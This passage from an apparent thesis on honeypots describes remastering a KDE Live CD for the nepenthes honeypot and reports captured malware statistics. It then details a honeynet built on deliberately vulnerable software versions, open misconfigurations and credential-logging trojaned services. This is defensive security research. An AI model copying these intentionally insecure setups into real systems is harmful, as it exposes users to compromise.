is both reliable and stable. However, in its default configuration, KDE offers many
functions that are not strictly required for our needs, for instance, multimedia playing
capabilities. Consequently, we have to customize the existing environment and remove
all dispensable components to make the user interface as intuitive as possible. Furthermore, we change many visual elements and system settings to create a unique and
distinguishable look of our Live CD. For example, we add desktop icons and submenu
entries to permit easy access to the honeypot module. We also adapt the desktop wallpaper, the appearance of the login and logoff screen, and the system color palette. As
these operations involve modifying a large number of files and options, a complete and
detailed presentation of all changes would not be beneficial. Thus, we rather describe
the architecture of the KDE platform from a more abstract point of view for a better
understanding.
The desktop environment as a whole consists of several individual applications that
are split into software packages (see also Hall, 2005). For instance, the KDE base package
comprises all core components such as the default window and file manager, a terminal
emulator to provide access to the command shell, and a control center for administrative purposes. Each program also requires multiple system libraries that are part of the
kdelibs package. Both these packages are included on the Live CD. Further optional
features such as personal information management tools are, as we have already mentioned above, not strictly needed for our purposes and may thus be omitted to reduce
complexity and keep the size of the distribution as small as possible.
The different KDE applications are tightly interconnected and work together
as indicated in Figure 4.13. One of the most important parts of the environment
is the login manager kdm which is mainly responsible for user authentication. It is the
first program to be launched in the KDE startup hierarchy. Kdm displays a graphical login screen and prompts users to enter their credentials. The appearance of this
screen can be customized by editing the kdmrc configuration file which is stored in the
/usr/share/config/kdm directory of the Live CD. Thereby, it is, for instance, possible
to show a short greeting message or a custom logo when logging in. An explanation of
the corresponding configuration directives is given by Buddenhagen (2007).
When a valid username and password are entered, a new desktop session is prepared.
For this purpose, a special startup script is invoked and a so-called master process gets
executed. Similar to the init process of the operating system (cmp. Section 4.3.1.1),
this master process acts as a parent for a number of further services that are started in
Figure 4.13: Components of the KDE Platform
the background, e.g., kcminit which supports different profiles and user-specific settings
for hardware devices. The default configuration of these components is suitable for our
distribution and does not need to be altered.
In the last step, the ksmserver session manager is loaded. It sets up the desktop as
well as the control panel, restores the state of previously run programs, and processes
scripts that are stored in a predefined autostart folder. Since these activities greatly
affect the visual design of KDE, applications that are started by the ksmserver are of
particular relevance to the customization of the user interface.
In the following, we illustrate the general customization procedure based on the central
elements of the user environment: The KDE desktop and the control panel provide a
comfortable way to open programs quickly, either by clicking on a desktop icon or by
selecting an item in the system menu which is part of the control panel at the bottom
of the screen. To adapt the appearance and behavior of these components, we can use
the kcontrol and kmenuedit utilities that are integrated in KDE. Additionally, several
built-in functions of the interface are of great help. For example, we are able to add,
change, or remove desktop icons easily by choosing the respective command from a
context menu. It is important to stress though that these modifications always apply
to the current user only. Thus, the user-specific settings have to be transferred to the
system level in order to implement the changes on a global scope. For this purpose, we
must manually copy the individual configuration files to the designated folders in the
directory hierarchy. The specific user and system-wide directories that are relevant for
this process are summarized in Table 4.10 (see also Bastian, 2004).
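The transfer of user-specific settings to the system level can be sketched as a simple copy operation. The function name promote_kde_settings is hypothetical, and the per-user source path in the comments is an assumption about the KDE directory layout; the names of the files to transfer depend on the settings that were changed.

```shell
#!/bin/sh
# Hypothetical helper: copy user-specific KDE configuration files to the
# system-wide configuration directory so that they apply to all users.
promote_kde_settings() {
    user_dir=$1      # assumed per-user location, e.g. ~/.kde/share/config
    system_dir=$2    # system-wide location, e.g. /usr/share/config
    shift 2
    mkdir -p "$system_dir" || return 1
    for name in "$@"; do             # names of the configuration files to transfer
        if [ -f "$user_dir/$name" ]; then
            # -p preserves the mode and timestamps of the original file
            cp -p "$user_dir/$name" "$system_dir/$name" || return 1
        else
            echo "skipped (not found): $name" >&2
        fi
    done
}
```

A call such as promote_kde_settings ~/.kde/share/config /usr/share/config kdeglobals would publish the global KDE settings of the current user. Since user-specific files take precedence over system-wide ones, stale copies in the home directory of other users would still override the transferred files.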
Although these operations are cumbersome, they must be carried out with great care
Directory                  Description
/usr/bin                   Stores the KDE executables, including the startup script and the KDM binary.
/usr/lib                   Stores the libraries that are required for the desktop environment.
/usr/share/services        Includes configurational settings for internal system services such as text or picture rendering engines.
/usr/share/applications    Contains definition files for the desktop icons.
/usr/share/config          Contains files with system-wide configurational directives. The file kdeglobals is processed by all KDE applications.
/usr/share/icons,          Stores multimedia-related files that can be used by any KDE program.
/usr/share/sounds,
/usr/share/wallpapers
~/.kde, ~/.local           Contains user-specific settings and definitions. Configuration files that are stored in this directory tree take higher precedence over system-wide declarations.
Table 4.10: Important User and System-Wide Directories of the KDE Platform
(Source: Based on Seigo, 2007)
Figure 4.14: User Interface of the Live CD. (a) Initialization of the Main Desktop Environment; (b) Running Instance of the nepenthes Honeypot
to maintain the integrity of the system. Once all modifications are completed, we have
to update the file system modules and create a new version of the distribution as described in Section 4.3.3.1. Finally, we only need to burn the generated image to CD in
order to finish the remastering and customization process of the Live CD. Two sample
screenshots of the user interface are shown in Figures 4.14(a) and 4.14(b).
4.3.4 Capturing Autonomously Spreading Malware with the Live CD
In order to assess the operability of our Live CD, we have implemented a working
prototype and captured autonomously spreading malware over a period of two months,
from March 7, 2008 to May 7, 2008. Our test sensor was deployed in the IP range
of a German private Internet service provider (ISP). Apart from minor reconfiguration
and maintenance breaks, the system ran continuously, 24 hours a day. For
administrative reasons, the IP address of the machine was dynamically updated every
night.
An overview of the results of our research is given in the following section.
However, we need to emphasize that these results must be regarded as preliminary.
Further studies have to be conducted in the future to generate more empirically valid
and representative statistics.
4.3.4.1 Overview about the Collected Data
Throughout the observation period, our Live CD sensor was targeted more than 46,000
times. 40 countries were involved in the incidents. However, more than 98% of all probes were
traced to cities in Germany, the Russian Federation, and the United States (cmp.
Figure 4.15).
Regarding the intensity of the attacks, the number of malware samples nepenthes
identified and tried to retrieve varied significantly (see Figure 4.16): While we detected
almost 3,300 download attempts on May 4, this number dropped to the smallest value of
21 only three days later on May 7, the end of our experiment. On average, our honeypot
sought to gather 837 binaries per day.
Figure 4.15: Origin and Intensity of Malware Attacks
Figure 4.16: Number of Detected Malware Downloads and Submissions per Day
However, it is also important to note that, in many cases, the collection process was
not successfully completed, e.g., because the server the malicious software application
resided on had been shut down in the meantime (cmp. also Provos and Holz, 2007).
For this reason, only 15,578 executables could be fetched. A list of the most frequent
threats that we have seized with our Live CD can be found in Table 4.11.
Each of the captured files was sent to a central analysis station for further investigation
as explained in Section 4.3.2 (see also the red graph in Figure 4.16). Thereby, we were
able to study its behavior in more detail. In particular, we examined outbound network
connections that were initiated with the external environment as well as manipulations
of the underlying system platform. An example of a summary report that was returned
by the analysis station at the end of the examination process can be found on the
accompanying CD of this thesis. A complete description of the functionality of the
station is given by Willems et al. (2007).
We also checked the set of unique submitted samples against a list of 32 different virus
scanners. A file is defined as unique if its cryptographic checksum differs from
that of every other sample. A binary that is falsely classified as being uninfected
in the course of this process indicates a severe threat, since it is not yet included in
the definition database of the antivirus vendors and, thus, may potentially bypass the
security restrictions of the local system. In total, 1,013 files were scanned. The results
of these scans are briefly described in the next section.
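The uniqueness criterion can be sketched with standard tools. This is a minimal sketch, assuming that the captured binaries are stored as regular files in a single directory and that the md5sum utility is installed; the function name count_unique_samples is hypothetical and does not refer to a script used in this thesis.

```shell
#!/bin/sh
# Hypothetical helper: print one line per unique file content in a directory,
# in the form "<md5 checksum> <number of files with that checksum>".
count_unique_samples() {
    sample_dir=$1
    for f in "$sample_dir"/*; do
        [ -f "$f" ] || continue
        md5sum < "$f"        # reading from stdin prints "<checksum>  -"
    done |
    awk '{ count[$1]++ } END { for (sum in count) print sum, count[sum] }' |
    sort
}
```

The number of output lines corresponds to the number of unique samples, for example count_unique_samples DIRECTORY | wc -l, where DIRECTORY is a placeholder for the storage location of the binaries.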
Malware                    MD5 Checksum                      Submissions
Worm.VanBot.AX.215         954a98c971fda498f9d1211f18e75cd7  851
Win32.Virut.AL             0c22f6dc09641566e42984323b869136  523
Win32.Virut.AL (Variant)   175dffd2f768887fbd0b156383cf3b05  444
Trojan.Dldr.Delf.buz       364389256ea74bb06d6825e7ee1689d9  417
Worm.SdBot.100864.22       7fdfe363d51e27caa1b6d490646e66f5  410
Worm.SdBot.444416          146d61fca77d748f5a5ecff53afd30e4  402
Trojan.Agent.143360.4      2aa59ba4251795deda72738d1c67be7c  351
Worm.VanBot.FO             bec892aaf3a5d697da7db26bb3d32028  331
Win32.Virut.AL (Variant)   1000e2436a560eaeaa01a1029d8f33b4  276
Win32.Virut.Gen            2383438901c46f3672b047961e8533b9  214
Table 4.11: Top Malware Samples Captured with the Live CD
4.3.4.2 Evaluation of the Collected Data
On average, the different virus scanners were capable of correctly identifying almost
82% of the malware samples. However, the quality of the individual software products
differed dramatically in some cases. As indicated in Figure 4.17, only one of the 32 vendors
detected more than 98% of the malicious applications. In contrast, four scanners erroneously reported more than 20% of the infected binaries as clean. The performance of
the different solutions is illustrated in more detail in Figure 4.18.
Even though most detection rates are comparatively high, it must also be
stressed that about 10% of the captured executables went unrecognized by at least two
vendors. In 27 cases, more than 80% of the scanners failed to discover the security threat.
One binary with the cryptographic checksum b670a676045337c77838c8ab4597dfcb
even completely slipped by and remained hidden from all tested products.
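The detection rate of a scanner is the share of scanned samples that it reports as malicious. The following sketch computes this value per scanner. The input format, one line per scan in the form "<checksum> <scanner> <verdict>" with the verdict being either detected or clean, and the function name detection_rates are assumptions made for illustration; they do not describe the evaluation scripts or data files used for this thesis.

```shell
#!/bin/sh
# Hypothetical helper: print "<scanner> <detection rate in percent>" for every
# scanner that occurs in the results file given as the first argument.
detection_rates() {
    LC_ALL=C awk '
        { total[$2]++ }                      # every line is one scanned sample
        $3 == "detected" { hits[$2]++ }      # count correctly identified samples
        END {
            for (s in total)
                printf "%s %.1f\n", s, 100 * hits[s] / total[s]
        }
    ' "$1" | sort
}
```

A scanner that flags three out of four samples would be listed with a rate of 75.0, and a scanner that misses every sample with a rate of 0.0.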
Figure 4.17: Detection Rates of 32 Antivirus Vendors
Figure 4.18: Individual Performance of 32 Antivirus Vendors
4.3.5 Summary
In this chapter, we have described the selection and development process of a Live
CD-based honeypot. A Live CD completely runs in memory and provides an operating
system, a number of applications, as well as a basic user environment. When the machine
is rebooted, changes made during runtime are reset, i.e., the decoy may be quickly
restored after a compromise.
Instead of building our own Live CD from scratch, we have decided to remaster an
existing distribution and adjust its features to our needs. To this end, we have evaluated various potential candidates and selected the Slackware-based Slax as a starting
point for our project. Due to its modular design, it is comparatively easy to adapt.
Furthermore, it is compatible with most modern computer systems and is actively
supported by a lively community.
Regarding the honeypot solution, we chose to implement nepenthes, a low-interaction
decoy that is capable of collecting autonomously spreading malware on a large scale by
emulating common vulnerabilities. It is highly scalable, consumes only small amounts of
space and, thus, is well-suited for a Live CD environment with limited system resources.
To ensure the security and integrity of the CD, the honeypot was packaged within
its own file system module and is executed within a so-called jail. The jail provides
a pseudo root directory and is physically strictly separated from other parts of the
operating system. Additionally, by shutting down unnecessary services, using a two-factor authentication mechanism for the SSH remote administration server, and defining
access control lists, we hardened the system further against attacks.
We have developed a working prototype of the CD with its own system kernel, boot
loader, and a customized graphical user interface. Over a period of two months, we
have captured malware samples and collected more than 1,000 unique malicious binaries.
Based on the data set, we have evaluated the performance of different antivirus solutions.
In sum, most samples were correctly reported as being suspicious. However, about one
tenth of the executables were not properly recognized by the products and remained
undetected. Our Live CD may help improve detection rates in the long term by finding
new and unknown threats. Thereby, malicious activities on the Internet may potentially
be measured and assessed more accurately.
5 Implementation, Deployment, and Analysis of a Honeynet
In the previous chapter of this thesis, we have described the development process of
a Live CD-based low-interaction honeypot for capturing and analyzing autonomously
propagating malware. As we have pointed out, by emulating a number of known security weaknesses, we were able to attract common species of malicious software, study
their behavior, and generate statistical reports about their spread on the Internet. Although the collected data are beneficial for assessing the general level of threat from an
abstract point of view, we learned only little about why systems are actually attacked and
what they are used for once a compromise has succeeded. To help answer these questions, we set up a group of high-interaction honeypots within a honeynet. As explained
in Chapter 3, this honeynet is a highly overt network environment as all incoming communication requests are passed to the interconnected machines without being filtered.
On the other hand, outgoing traffic flows are tightly controlled by several layers of data
capture and data control. As a consequence, we may implement full-featured operating
systems, applications, and services that potentially allow monitoring more complex and
sophisticated attacks. At the same time, we can keep the risk for non-affected third
parties at a minimum.
Due to the manifold possibilities for interaction, the individual electronic baits are
likely to attract not only automatically spreading malware, but human attackers as well
(cmp. Curran et al., 2005). In comparison to low-interaction honeypots, we thus have
the chance of gaining a more thorough insight into the psychology of adversaries and learning
more about their tools, tactics, and motives.
In the following section, we outline the architecture of our honeynet and the respective
system environment. We describe the technical specification of the individual honeypots,
illustrate the deployment of the Honeywall, and introduce various tools and utilities that
help monitor, capture, as well as analyze malicious activities.
An overview of the data that we have collected with our honeynet is given
in Section 5.2. We also sketch common attacks on the decoys that we have frequently
detected during the observation period. Two selected system compromises are presented
in more depth in Section 5.3. We conclude with an analysis of a covert underground
communication channel and a short summary of our findings.
5.1 Overview about the Architecture of the Honeynet and the System Environment
The core of our honeynet consists of three independently running high-interaction honeypots that are set up within virtual machines for maintenance reasons as we have
indicated in Chapter 2. Regarding the technical specification of the decoys, we decide
to implement both Microsoft Windows and Linux operating systems. Thereby, we are
able to measure intrusion attempts on two major platforms many desktop and server
machines are based on (cmp. Net Applications, 2009). Additionally, we install several
well-known web applications that commonly fall prey to attacks. These applications usually collaborate with further, underlying technologies such as database engines which are
significantly more complex to administer and maintain. For these reasons, and because of the
often poor quality of the source code (see Holz et al., 2006), vulnerabilities in either of
these software tiers may possibly lead to a total system compromise. As web applications may thus involuntarily act as a “stepping stone into more sensitive parts of the
victim’s network” (Riden et al., 2007), they are well-suited for our research purposes.
We also set up a number of system services with certain misconfigurations that are
likely to be discovered and exploited. For instance, we define improper access rights for a
file transfer server and permit even non-authenticated users to upload and execute their
own files. Thereby, we imitate the behavior of a so-called anonymous server which is
frequently abused by software pirates to share illegally obtained media (see also McClure
et al., 2005; Craig and Burnett, 2005).
Because of the different security weaknesses, our honeypots form attractive targets
for cyber criminals. In order to make their disclosure more difficult, we develop a bogus
website for a fictional university chair, including phony information about lectures and
academic curricula. Thus, we are able to embed the web applications and services in a
more realistic scenario, making the machines appear as legitimate productive systems.
It is important to stress though that an experienced attacker will presumably not be
deceived by these activities but will rather be able to reveal the true nature of the
decoys, e.g., by identifying specific anomalies in the system architecture (see Chapter 2
and Corey, 2003, 2004; Garfinkel et al., 2007). However, as these techniques usually
require certain skills, we can still learn valuable information: As Provos and Holz (2007)
conclude, “although honeypot detection might seem to be of more benefit to malicious
adversaries, in computer security, it is important to understand all aspects of a system
(...) and the flaws of your technology”.
In the last step, we prepare several fake documents that we store on each of our
machines. For example, we compose an executive summary for an imaginary project
that contains valid account names and passwords to one of our honeypots. If an attacker
retrieves the information and tries to log in, we can start tracing activities across multiple
systems. As such, the documents act as honeytokens and prove unauthorized access of
the respective resources (cmp. Spitzner, 2003f). What is more important, we are able
to depict interactions between the various decoys, hence creating a potentially more
accurate profile of the intruder as well as her intentions.
The characteristics of the individual honeypots and their components are presented
in more detail in the following.
5.1.1 Technical Specification of the Honeypots
As indicated in the previous section, we implement three electronic baits based on Microsoft Windows and Linux operating systems.
5.1.1.1 Microsoft Windows-Based Honeypot
The first honeypot we deploy runs a Microsoft Windows XP operating system with a
pre-installed service pack 2. Access is permitted for the system administrator as well
as for a non-privileged user. Both accounts are solely protected with weak passwords.
Therefore, we expect adversaries to perform dictionary and brute force attacks over the
network in order to successfully compromise the host.
Additionally, we set up the latest xampp1 distribution by Kai Seidler. It comprises an
Apache web server, the MySQL database management system, a basic file transfer server,
and support for several programming languages such as PHP and Perl. In its default
configuration, the distribution is inherently insecure (cmp. Vogelgesang, 2007). For
example, the phpMyAdmin administrative user interface for the database management
system2 is fully accessible over the Internet. As we will see later, this feature puts the
security of the entire machine at risk.
We also install the phpBB web application3 , a popular forum software which was
originally developed by James Atkinson. The rather outdated version 2.0.8a is exposed
to multiple vulnerabilities that may reveal potentially sensitive information such as the
full path to the root directory (see Vind, 2005). Furthermore, the program contains
several highly critical programming flaws that may help attackers get system access or
manipulate data (see Secunia, 2004; CERT, 2004). Because of these characteristics, our
machine forms a relatively easy target for intruders and is likely to be probed frequently.
5.1.1.2 Linux-Based Honeypots
Apart from the Windows-based honeypot, we run two electronic baits with Linux operating systems that are built on the Fedora Core and Suse distributions.
1 see http://www.apachefriends.org/en/xampp.html
2 see http://www.phpmyadmin.net/
3 see http://www.phpbb.com/
• Fedora Core-Based Honeypot
The second decoy within our honeynet setup is implemented upon an installation of the
Fedora Core 3 release4 . It includes the Apache web server and the MySQL database
management system. However, in comparison to the xampp distribution that we have
introduced in the previous section, the configuration of the individual applications is
more secure by default. For instance, the web server is started with non-privileged access
permissions, and logins to databases are restricted to local users only. For this reason,
we assume that intruders must attempt more sophisticated penetration strategies, e.g.,
executing exploits, to manipulate these services.
Similar to the Windows-based honeypot, we run a web application, namely the TikiWiki content management system5 . Version 1.8.4 of the software is affected by several
critical security weaknesses (cmp. Secunia, 2009b). For example, due to an input validation error, attackers may upload and run their own scripts in a temporary directory (see
CVE, 2005). By passing specially crafted parameters to certain pages, it is also possible
to read arbitrary files on the system and disclose sensitive information (see iDefense,
2005).
In the next step, we set up communication and file transfer programs that form valuable targets for adversaries as well: First, we compile an outdated version of the WU-FTPD daemon6 which is prone to a remote buffer overflow (see CVE, 2003). Since the
exploit code for this vulnerability is publicly available (see Dong-Hun, 2003), we expect the computer to be compromised within a short amount of time. Furthermore, we
redefine the configuration settings of the service and permit world-writable access to
certain directories. As a consequence, our system appears as an anonymous FTP server to
the external environment and is likely to attract software pirates as explained in Section
5.1. Second, we install a secure shell server that contains a number of buffer management flaws. When abused, attackers may inject malicious instructions and gain control
of the machine (see CERT, 2003b). The server is also of great interest to intruders,
because data flows are always sent over an encrypted channel. As a result, monitoring
and filtering devices such as firewalls can be effectively bypassed.
• Suse-Based Honeypot
The third and last honeypot within our honeynet is built on a Suse Linux operating
system, version 9.3. As is the case with the two other decoys, we run the default Apache
web server and the MySQL database management system that are provided with the
distribution. The latter is vulnerable to a remote buffer overrun and may cause arbitrary
code execution or lead to a denial of service situation (see SecurityFocus, 2006a). The
respective exploit is published by Paola (2006).
4 see http://fedoraproject.org/
5 see http://info.tikiwiki.org/tiki-index.php
6 see http://www.wu-ftpd.org
We also deploy three web-based programs which may be attacked with different techniques: The phpMyFAQ application7 permits implementing a bulletin board for frequently asked questions (FAQs). Version 1.6.6 suffers from various security weaknesses
(cmp. Secunia, 2009a). For instance, input parameters are not sanitized properly. Consequently, adversaries are able to manipulate database queries, inject malicious code,
and penetrate the underlying system (see CVE, 2006b).
The TR NewsPortal software8 is a simple newsreader by Adam Glowienka. Due to an
input validation error in the release version 0.36a, attackers can include their own scripts
and compromise the host as demonstrated by Kacper (2006) (see also SecurityFocus,
2006b).
Furthermore, the version of the phpMyAdmin database management utility that is
distributed with our Linux installation contains multiple cross-site scripting (XSS) vulnerabilities. As a result, it is possible to insert malicious code instructions and potentially disclose sensitive information, e.g., authentication credentials (cmp. SecurityFocus,
2006c).
Finally, we install a secure shell as well as a Samba server to support remote interactions with the core system. A Samba server facilitates communication between machines
in a hybrid environment by maintaining a number of directories that are globally shared
in a network. Thereby, computers running a Linux operating system can, for example,
retrieve resources on a Windows-based host and vice versa (cmp. Eckstein et al., 2007).
We define several of these network shares with full access permissions on each honeypot. Thus, once a decoy is compromised, it may be used as a starting point to attack
the remaining systems within our honeynet. As a result, we can monitor incidents on a
network-wide scope and gain a more thorough understanding about the strategies and
intentions of the intruder.
The technical specifications of the individual honeypots are summarized in Table 5.1.
As can be seen, the installed services and applications contain various vulnerabilities
that are, for example, caused by input validation errors and poorly designed access
permissions. When a decoy is successfully penetrated, it poses a significant threat to
other machines on the network as well as to non-affected third parties. That is why we
must make sure adversaries do not accidentally or purposefully harm systems outside of
the honeynet (cmp. Honeynet Project, 2004b, p. 38). We can mitigate that risk with
the help of the Honeywall. The corresponding setup is the subject of the following section.
7 see http://www.phpmyfaq.de/
8 see http://www.newsportal.one.pl/
Honeypot - Windows XP, Service Pack 2

Service Name            Description
Apache 2.2.8            Web server which is required to run PHP-based
                        applications and display dynamic content.
FileZilla 0.9.25 beta   FTP server that allows exchanging files over the
                        Internet. The default authentication credentials for
                        the administrative account are published “in the
                        wild”. Therefore, intruders may easily gain access
                        and explore the entire directory hierarchy as well as
                        upload their own tools.
MySQL 5.0.51            Database management system with built-in support for
                        remote logins. The application can be quickly
                        compromised, because the root superuser account is
                        not protected with a password.

Web Application         Description
phpBB 2.0.8a            Forum software which contains several highly critical
                        programming flaws and may disclose sensitive
                        information as well as help attackers get access to
                        the system.
phpMyAdmin 2.11.4       Front end for the MySQL database management system.
                        The application is fully accessible over the network
                        and permits manipulating all databases that are
                        stored on the machine.

Honeypot - Fedora Core 3

Service Name            Description
MySQL 3.23.58           Database management system which is solely protected
                        with a weak password. Due to the configuration
                        settings, logins are only possible after gaining
                        shell-level access though.
OpenSSH 3.7.1p1         Secure shell server that contains several buffer
                        management flaws. If the vulnerabilities are abused,
                        arbitrary commands may be executed on the host.
                        Additionally, the server permits adversaries to
                        establish encrypted communication channels. Thus,
                        network eavesdropping is made more difficult.
WU-FTPd 2.6.0           FTP server that permits anonymous write operations.
                        As a result, the server can be abused by software
                        pirates to store copyright-infringing material.

Web Application         Description
TikiWiki 1.8.4          Content management system that does not validate user
                        input properly. Consequently, intruders may upload
                        their own scripts as well as read arbitrary files on
                        the system.

Honeypot - Suse Linux 9.3

Service Name            Description
MySQL 4.1.10a           Database management system that is affected by a
                        buffer overrun vulnerability and may cause a denial
                        of service situation.
OpenSSH 3.7.1p1         Secure shell server that contains several buffer
                        management flaws. If the vulnerabilities are abused,
                        arbitrary commands may be executed on the host.
                        Additionally, the server permits adversaries to
                        establish encrypted communication channels. Thus,
                        network eavesdropping is made more difficult.
Samba 3.0.12-5          Software for providing file as well as printer
                        sharing services across a network. Since network
                        shares are defined on each machine, they may be used
                        as a starting point for further attacks.

Web Application         Description
phpMyAdmin 2.6.1        Front end for the MySQL database management system.
                        The installed version is vulnerable to multiple
                        cross-site scripting attacks and allows intruders to
                        insert malicious code instructions.
phpMyFAQ 1.6.6          Bulletin board software for frequently asked
                        questions that is prone to malicious SQL and code
                        injection techniques that may be exploited to gain
                        system access.
TR NewsPortal 0.36a     Simple newsreader program that contains an input
                        validation error and enables attackers to include
                        their own scripts.

Table 5.1: Technical Specification of the Honeypots
5.1.2 Deployment of the Honeywall
As we have already explained, the Honeywall acts as a gateway system to the honeynet
where all traffic flows have to pass through. It comprises various monitoring and filtering
devices such as IPTables, Snort, and Snort Inline that we have described in depth in
Chapter 3. With the help of these applications, incoming and outgoing network packets
can be inspected and, if required, even be discarded. Thereby, attacks on the external
environment can be effectively prevented. As such, the gateway meets the requirements
for data control as imposed by the Honeynet Project (2004a) which are crucial to a
safe deployment of electronic baits. Moreover, it satisfies the conditions concerning
data capture and data analysis by providing several tools for monitoring, logging, and
investigating malicious activities (see also Chapter 3). Because of these characteristics,
the Honeywall is often regarded as the “heart” of a honeynet (cmp. Provos and Holz,
2007).
We may easily set up the whole system including all components with the Roo CD
which is distributed by the Honeynet Project. It can be downloaded for free from the
project homepage9 . When the CD is booted, it automatically begins to install a hardened
Linux operating system. During this process, existing partitions and files on the hard
disk of the machine are overwritten. For proper functionality in later use, we recommend
a computer with at least 512 MB of memory, an x86 Intel Pentium processor, 10 GB of
free space, and three network interface cards (NICs) (see Honeynet Project, 2007).
After completing the installation procedure, the system is rebooted, and we can start
to customize the Honeywall according to our needs. For this purpose, we must log in
with the default authentication credentials (username roo, password honey), switch to
the superuser mode with the same password, and run the menu command to invoke the
main configuration utility for the honeynet. The different configuration settings and
parameters may then be adjusted with a dialog-based interview wizard. An overview
of the most important options that must be specified during the interview is given
in Table 5.2; the entire configuration file can be found on the accompanying CD of this
thesis.
9 see https://projects.honeynet.org/honeywall/

Configuration Options                   Description
Honeypot-Related Options                Honeypot-related options mainly comprise the
                                        network configuration for the individual
                                        decoys, e.g., the assigned IP address.
Management Interface-Related Options    With the help of these options, it is possible
                                        to set the network parameters for the Walleye
                                        web management interface such as the address
                                        of the default gateway, the DNS servers that
                                        are associated with the application, or the
                                        system name of the host.
CRLM Options                            CRLM (Connection Rate Limiting Mode) options
                                        specify the number of outgoing connections
                                        that may be initiated by the honeypots before
                                        being filtered. The recommended settings for
                                        these options were outlined in Chapter 3.
Address Filtering Options               Address filtering options include information
                                        about black and white lists that control what
                                        machines are granted or rejected access to the
                                        honeynet. Additionally, a so-called fence list
                                        can be defined in order to block outgoing
                                        connections from a decoy to specific network
                                        segments.
Alerting Mode Options                   With these options, automatic email alerts may
                                        be enabled or disabled that are sent to the
                                        honeynet administrator once an incident is
                                        detected by the Honeywall.
Sebek Options                           These options help configure the server
                                        component of the Sebek data monitoring
                                        utility. For instance, the destination address
                                        and the network port for the Sebek
                                        notification packets can be specified.

Table 5.2: Important Configuration Options of the Honeywall
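The idea behind the CRLM options can be illustrated with a few lines of Python. The fragment below is only a sketch and not the mechanism used by the Honeywall, which enforces its limits with IPTables rules. The class name OutboundLimiter as well as the limit and window values used in the test are assumptions chosen for the example; the recommended settings are those outlined in Chapter 3.

```python
from collections import defaultdict, deque


class OutboundLimiter:
    """Toy model of connection rate limiting for outbound honeypot traffic.

    Hypothetical helper for illustration only; the real Honeywall enforces
    its limits with IPTables rules.
    """

    def __init__(self, max_connections, window_seconds):
        self.max_connections = max_connections
        self.window_seconds = window_seconds
        # Timestamps of recently permitted connections, per honeypot address.
        self._history = defaultdict(deque)

    def allow(self, honeypot_ip, now):
        """Return True if a new outbound connection at time `now` is permitted."""
        recent = self._history[honeypot_ip]
        # Forget connections that have dropped out of the sliding window.
        while recent and now - recent[0] >= self.window_seconds:
            recent.popleft()
        if len(recent) >= self.max_connections:
            return False  # limit reached: the connection would be filtered
        recent.append(now)
        return True
```

Each decoy is tracked separately, so one heavily abused honeypot does not exhaust the budget of the others.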
At the end of the interview, the affected filtering and monitoring services are restarted.
However, before putting the Honeywall into operation, we adapt the local time zone and
synchronize the hardware clock as illustrated by the Honeynet Project (2005c). These
steps are of utmost importance for recovering the exact sequence of an incident during the
investigation phase at a later point in time. Furthermore, we initialize Tripwire10 , a
host-based intrusion detection system that is already included in the system (see also
Honeynet Project, 2005b). It periodically performs an integrity check for each file.
Thereby, potential manipulations of the individual components can be discovered.
When all operations are finished, we may retrieve the status of the Honeywall at all
times using the Walleye web management interface which is part of the Roo distribution.
The management interface must be launched over an encrypted channel for security
reasons. After logging in as the admin user, a summary of the traffic flows entering or
leaving the honeynet as well as the number of detected intrusions is displayed in the
upper left corner of the screen (see Figure 5.1). By clicking on a highlighted element
in one of the different columns, we can request additional information about network
activities (see Figure 5.2). It is also possible to inspect specific connections in more detail,
e.g., to examine a penetration attempt that was detected by our Honeywall as shown
in Figure 5.3. In the given example, an attacker with the IP address 218.44.xxx.xxx
repeatedly failed to access a network share on our Microsoft Windows honeypot via the
NetBIOS and SMB (Server Message Block) protocols.
10 see http://www.tripwire.org/
Figure 5.1: Main Screen of the Walleye Web Management Interface
In addition to data analysis-related features, Walleye also allows us to fully reconfigure
the honeynet architecture and supports changing certain system settings such as the keyboard language or the hostname. As a consequence, we can perform many administrative
tasks comfortably over the Internet without needing to log in to the local machine. In
summary, these mechanisms make the web management interface the primary tool for
the everyday observation and maintenance of the honeynet.
Figure 5.2: Overview about the Network Flows from/to the Honeynet
Figure 5.3: Example of an Intrusion Attempt on a Honeypot
5.1.3 Preparation of the System Environment
Even though the Honeywall implements sophisticated applications to capture, control,
and analyze malicious activities, we recommend setting up several other programs before
connecting the honeynet to the external environment. These programs either help collect
more extensive information about adversaries or facilitate the post-incident investigation
process after a decoy has been compromised.
5.1.3.1 Implementation of Data Capture-Related Programs
• Sebek
Sebek11 is a utility for capturing activities on a honeypot and is maintained by the
Honeynet Project. We have already described its architecture as well as its technical
specification in detail in Chapter 3. Therefore, only the deployment process of the utility
is presented in the following.
11 see http://www.honeynet.org/tools/sebek/
As we have explained, Sebek consists of a client as well as a server component. The
latter is part of the Honeywall, while the client component must be separately installed
on each decoy.
On Linux operating systems, Sebek is implemented as a loadable kernel module, i.e., it
can be dynamically attached to the kernel at runtime (cmp. Kroah-Hartman, 2006). For
this reason, in order to build the module, we must first download the source code for the
kernel the utility will later run on. In the next step, the source code must be prepared
and compiled as outlined in Section 4.3.3.5 with respect to the custom kernel of our
Live CD. When this operation is completed, we are able to start the configuration and
compilation process of the Sebek module. The generated archive can then be transferred
to the target system and be decompressed. To deploy the Sebek client, we simply need to
run the respective install script. However, before we execute the script, we need to make
sure all its configuration parameters are correctly specified as outlined by the Honeynet
Project (2003c). For instance, it is particularly important to define the MAC (Media
Access Control) address and the destination port of the gateway system; otherwise, client-related notification packets are not delivered to the Sebek server and cannot be analyzed
on the Honeywall.
When the module has been successfully installed, keystrokes and system-relevant
information on the honeypot are captured until the machine is rebooted. Consequently, if an
adversary manages to restart the computer, her activities are no longer recorded.
Therefore, we must carefully monitor the state of our decoys at all times and reinstall
the monitoring devices if necessary.
The client component is also available for Microsoft Windows operating systems. It
is implemented as a device driver and may be easily set up by running an installation
wizard which is part of the main program archive. In our case, however, the affected
systems tended to become extremely unstable and repeatedly crashed with a blue screen
after the application had been deployed. For this reason, we omitted the Sebek package
for our Windows XP honeypot, and data were merely collected with the help of network
monitoring devices.
• Trojaned System Services
The Sebek utility is most helpful to monitor attackers after a system has been successfully compromised. On the other hand, it is not capable of gathering extensive
information about penetration attempts. For example, when an intruder fails to log in
to a specific machine, the respective authentication credentials are not recorded. In case
strong encryption algorithms are being used, we are not able to recover these pieces of
information from the captured network logs either. The data is of high value though,
because common usernames and passwords that are tested during an attack can be
identified. Therefore, to close the information gap, we implement trojaned versions of
a number of system services such as the SSH server or the phpMyAdmin database administration program. For this purpose, we edit the source code of the applications and
adapt their authentication procedure as follows: When an intruder enters a username
and corresponding password, the data is silently written to a special file before it is
